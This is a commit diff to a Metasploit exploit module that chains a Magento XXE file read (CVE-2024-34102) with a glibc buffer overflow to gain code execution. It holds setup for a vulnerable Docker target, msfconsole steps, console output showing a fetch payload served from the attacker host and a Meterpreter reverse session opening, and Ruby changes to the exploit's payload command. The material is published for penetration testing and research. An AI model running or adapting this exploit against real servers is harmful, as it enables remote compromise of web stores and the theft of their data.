Fixed multiple sessions and instability

jheysel-r7 · Oct 10, 2024 · 44b33b8 · 44b33b8
1 parent 65936d1
commit 44b33b8
Show file tree

Hide file tree

Showing 2 changed files with 36 additions and 26 deletions.
diff --git a/documentation/modules/exploit/linux/http/magento_xxe_to_glibc_buf_overflow.md b/documentation/modules/exploit/linux/http/magento_xxe_to_glibc_buf_overflow.md
@@ -26,31 +26,36 @@ payload in memory and using the buffer overflow to execute it, resulting in an u
 ### Setup
 
 The following docker-compose file can be used to test this module. There are a few things that need to be noted:
-1. cURL is not installed by default in the target container, in order for a fetch payload to be successful run the
-   following once the container has been started:
-```
-   docker exec -it magento_magento_1 bash 
-   root@13c538f53068:/# apt update; apt install curl -y
-```
-2. The docker-compose file sets magento server's name to `localhost` and in order to exploit the container `rhost` must
+1. The docker-compose file sets magento server's name to `localhost` and in order to exploit the container `rhost` must
    be set to `localhost` (setting `rhost` to `127.0.0.1` or your local IP address will not work for this docker-compose file)
    and so given this configuration `msfconsole` must be running on the same host as the container.
-3. The network settings on my macbook didn't allow me to exploit this locally so I was running the containers and
+2. The network settings on my macbook didn't allow me to exploit this locally so I was running the containers and
    `msfconsole` from an Ubuntu 22.04 VM.
 
+Dockerfile
+```
+FROM docker.io/bitnami/magento:2.4.7-debian-12-r0
+
+# Install curl
+RUN apt update && apt install curl -y
+
+```
+
+docker-compose.yml
 ```
 services:
   mariadb:
     image: docker.io/bitnami/mariadb:10.6
     environment:
-      # ALLOW_EMPTY_PASSWORD is recommended only for development.
       - ALLOW_EMPTY_PASSWORD=yes
       - MARIADB_USER=bn_magento
       - MARIADB_DATABASE=bitnami_magento
     volumes:
       - 'old_mariadb_data:/bitnami/mariadb'
   magento:
-    image: docker.io/bitnami/magento:2.4.7-debian-12-r0
+    build:
+      context: .
+      dockerfile: Dockerfile
     ports:
       - '80:8080'
       - '443:8443'
@@ -62,7 +67,6 @@ services:
       - MAGENTO_DATABASE_NAME=bitnami_magento
       - ELASTICSEARCH_HOST=elasticsearch
       - ELASTICSEARCH_PORT_NUMBER=9200
-      # ALLOW_EMPTY_PASSWORD is recommended only for development.
       - ALLOW_EMPTY_PASSWORD=yes
     volumes:
       - 'old_magento_data:/bitnami/magento'
@@ -94,7 +98,7 @@ exploits the Arbitrary File Read vulnerability CVE-2024-34102.
 1. Do: `use linux/http/magento_xxe_to_glibc_buf_overflow`
 1. Set the `RHOST`, `SRVHOST` and `LHOST` options
 1. Run the module
-1. Receive 3 Meterpreter sessions as the `daemon` user.
+1. Receive a Meterpreter sessions as the `daemon` user.
 
 ## Scenarios
 ### Magento/2.4 (Community) running PHP 8.2.17, GLIBC 2.36-9+deb12u4
@@ -119,26 +123,23 @@ msf6 exploit(linux/http/magento_xxe_to_glibc_buf_overflow) > set fetch_srvhost 1
 fetch_srvhost => 172.16.199.130
 msf6 exploit(linux/http/magento_xxe_to_glibc_buf_overflow) > set rhost localhost
 rhost => localhost
-msf6 exploit(linux/http/magento_xxe_to_glibc_buf_overflow) > run 
-[*] Exploit running as background job 8.
-[*] Started reverse TCP handler on 172.16.199.130:4444 
+msf6 exploit(linux/http/magento_xxe_to_glibc_buf_overflow) > run
+[*] Exploit running as background job 57.
+
+msf6 exploit(linux/http/magento_xxe_to_glibc_buf_overflow) > [*] Started reverse TCP handler on 172.16.199.130:4444 
 [*] Running automatic check ("set AutoCheck false" to disable)
 [*] Using URL: http://172.16.199.130:8080/
 [*] Server started
-msf6 exploit(linux/http/magento_xxe_to_glibc_buf_overflow) > 
 [+] Exploit precondition 1/3 met: Detected Magento Community edition version 2.4 which is vulnerable.
 [+] Exploit precondition 2/3 met: PHP appears to be exploitable.
 [+] Exploit precondition 3/3 met: glibc is version: 2.36
 [+] The target appears to be vulnerable.
 [*] Attempting to parse libc to extract necessary symbols and addresses
 [*] Attempting to build an exploit PHP filter path with the information extracted from libc and /proc/self/maps
 [*] Sending payload...
-[*] Sending stage (3045380 bytes) to 172.30.0.4
-[*] Sending stage (3045380 bytes) to 172.30.0.4
-[*] Sending stage (3045380 bytes) to 172.30.0.4
-[*] Meterpreter session 1 opened (172.16.199.130:4444 -> 172.30.0.4:35510) at 2024-10-09 22:25:38 -0700
-[*] Meterpreter session 2 opened (172.16.199.130:4444 -> 172.30.0.4:35520) at 2024-10-09 22:25:38 -0700
-[*] Meterpreter session 3 opened (172.16.199.130:4444 -> 172.30.0.4:35524) at 2024-10-09 22:25:38 -0700
+[*] Sending stage (3045380 bytes) to 192.168.80.4
+[*] Meterpreter session 40 opened (172.16.199.130:4444 -> 192.168.80.4:60416) at 2024-10-10 10:56:06 -0700
+Interrupt: use the 'exit' command to quit
 [*] Server stopped.
 
 msf6 exploit(linux/http/magento_xxe_to_glibc_buf_overflow) > sessions -i -1

diff --git a/modules/exploits/linux/http/magento_xxe_to_glibc_buf_overflow.rb b/modules/exploits/linux/http/magento_xxe_to_glibc_buf_overflow.rb
@@ -74,7 +74,7 @@ def initialize(info = {})
               'Platform' => %w[unix linux],
               'Arch' => ARCH_CMD,
               'Type' => :unix_cmd
-              # Tested with cmd/linux/http/x64/meterpreter_reverse_tcp - NOTE the test container does not have curl nor wget installed by default
+              # Tested with cmd/linux/http/x64/meterpreter_reverse_tcp
             }
           ],
         ],
@@ -83,7 +83,7 @@ def initialize(info = {})
         'Notes' => {
           'Stability' => [ CRASH_SAFE, ],
           'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
-          'Reliability' => [ REPEATABLE_SESSION, ] # Multiple sessions return after a single module run, after multiple module runs expect to get no longer receive any sessions. It doesn't seem to crash the target but it does seem to stop responding to exploit attempts after a few tries
+          'Reliability' => [ REPEATABLE_SESSION, ]
         }
       )
     )
@@ -173,7 +173,7 @@ def check_libc_version
       end
     end
 
-    print_bad('Libc Version NOT FOUND') unless libc_version
+    CheckCode::Unknown("Unable to determine the version of libc") unless libc_version
 
     if libc_version > Rex::Version.new('2.39')
       CheckCode::Safe("glibc version is not vulnerable: #{libc_version}")
@@ -506,7 +506,16 @@ def build_exploit_path
 
     step4_custom_heap = ptr_bucket(@info['__libc_malloc'], @info['__libc_system'], @info['__libc_realloc'], size: 0x18)
     step4_use_custom_heap_size = 0x140
-    command = payload.encoded
+
+    # Fetch payloads run the payload in the background and results in multiple sessions being returned.
+    # If we prevent the payload from running in the background and kill the parent process after the payload completes
+    # running successfully we ensure only one session gets returned and improves the stability allowing the exploit to
+    # be run consecutively without issue.
+    if payload.encoded.ends_with?(' &')
+      command = "#{payload.encoded}& kill -9 $PPID"
+    else
+      command = "#{payload.encoded} && kill -9 $PPID"
+    end
 
     command = (command + "\x00").b
     command = command.ljust(step4_use_custom_heap_size, "\x00".b)